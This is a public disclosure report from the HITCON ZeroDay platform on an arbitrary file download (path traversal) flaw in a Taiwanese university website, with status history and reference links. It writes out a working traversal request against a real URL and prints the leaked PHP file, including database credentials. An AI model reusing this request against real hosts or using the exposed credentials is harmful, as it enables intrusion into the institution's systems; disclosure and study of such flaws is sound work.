Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2017-00609
- Vendor: 朝陽科技大學
- Title: 朝陽科技大學 Arbitrary File Download Vulnerability
- Introduction: Arbitrary File Download Vulnerability
處理狀態
目前狀態
公開
Last Update : 2017/10/05
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2017/08/05 17:21:06 : 新提交 (由 Hzllaga 更新此狀態)
- 2017/08/05 23:07:34 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2017/08/06 10:48:05 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2017/08/06 10:48:06 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2017/08/14 16:37:13 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2017/10/05 03:00:26 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2017-00609
- 通報者:haihai (Hzllaga)
- 風險:中
- 類型:任意檔案下載 (Arbitrary File Download)
參考資料
攻擊者可經由該漏洞取得後端系統中的任意資料(包含主機之敏感檔案)。
OWASP Top 10 - 2017 A5 - Broken Access Control
https://www.owasp.org/index.php/Top_10-2017_A5-Broken_Access_Control
OWASP Top 10 - 2013 A4 - Insecure Direct Object References
https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References
CWE-284: Improper Access Control
https://cwe.mitre.org/data/definitions/284.html
OWASP - Path Traversal 及防禦方式
https://www.owasp.org/index.php/Path_Traversal
CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
https://cwe.mitre.org/data/definitions/22.html
OWASP Top 10 - 2017 A5 - Broken Access Control
https://www.owasp.org/index.php/Top_10-2017_A5-Broken_Access_Control
OWASP Top 10 - 2013 A4 - Insecure Direct Object References
https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References
CWE-284: Improper Access Control
https://cwe.mitre.org/data/definitions/284.html
OWASP - Path Traversal 及防禦方式
https://www.owasp.org/index.php/Path_Traversal
CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
https://cwe.mitre.org/data/definitions/22.html
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
http://www.inf.cyut.edu.tw/download.php?filename={File}
敘述
http://www.inf.cyut.edu.tw/download.php?filename=../func/DB_HANDLE.inc.php
<?php
/
Filename DB_HANDLE.inc.php
author [email protected]
desc 資料庫處理
date 04/25/2004
/
$SV_Name = "localhost";
$DB_User = "mysqluser";
$DB_Passwd = "cyut111";
$cn = mysql_connect($SV_Name, $DB_User, $DB_Passwd) ;
mysql_query("SET NAMES Big5",$cn);
$db = mysql_select_db("coinfo", $cn);
?>
469
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。